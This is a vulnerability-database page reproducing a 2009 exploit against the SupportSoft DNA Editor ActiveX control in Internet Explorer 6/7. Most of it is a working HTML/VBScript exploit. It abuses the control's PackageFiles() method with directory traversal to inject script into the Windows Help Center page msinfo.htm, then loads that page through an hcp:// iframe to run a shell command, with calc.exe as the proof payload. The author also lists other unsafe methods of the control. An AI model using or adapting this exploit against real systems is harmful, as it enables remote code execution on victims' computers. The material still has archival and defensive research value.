Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SupportSoft DNA Editor Module Code Execution

🗓️ 05 Mar 2009 00:00:00Reported by Nine:Situations:GroupType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

SupportSoft DNA Editor Module Code Execution vulnerability detail

Code
`<!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)  
by Nine:Situations:Group::bruiser  
  
vendor url: http://www.supportsoft.com/  
our site: http://retrogod.altervista.org/  
  
details:  
CLSID: {01110800-3E00-11D2-8470-0060089874ED}  
Progid: Tioga.Editor.1  
Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll  
KillBitted: False  
Implements IObjectSafety: True  
Safe For Initialization (IObjectSafety): True  
Safe For Scripting (IObjectSafety): True  
  
vulnerabilities, discovered two months ago:  
insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one)  
SaveDna() - remote file creation, directory traversal  
AddFile() - remote cpu consumption  
SetIdentity() - remote file creation  
  
This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability,  
see: http://secunia.com/advisories/24246/  
My download url was: http://www.supportsoft.com/support/controls_update.asp  
actually unreachable  
see also: http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded  
Well, they probably patched my marking them unsafe for initialization (I see that the ScriptRunner module suffers of a  
buffer overflow bug in the Evaluate() method...) but they gave you another vulnerable control...  
-->  
<HTML>  
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />  
</OBJECT>  
<SCRIPT language='VBScript'>  
<!--  
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"  
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned  
DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"  
'launch the script and calc.exe trough the Help and Support Center Service  
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")  
-->  
</SCRIPT>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Mar 2009 00:00Current
7.4High risk
Vulners AI Score7.4
supportsoftdna editorcode executionvulnerabilityremote file overwritedirectory traversalscript injectionbuffer overflowactivex controlssecurity update
37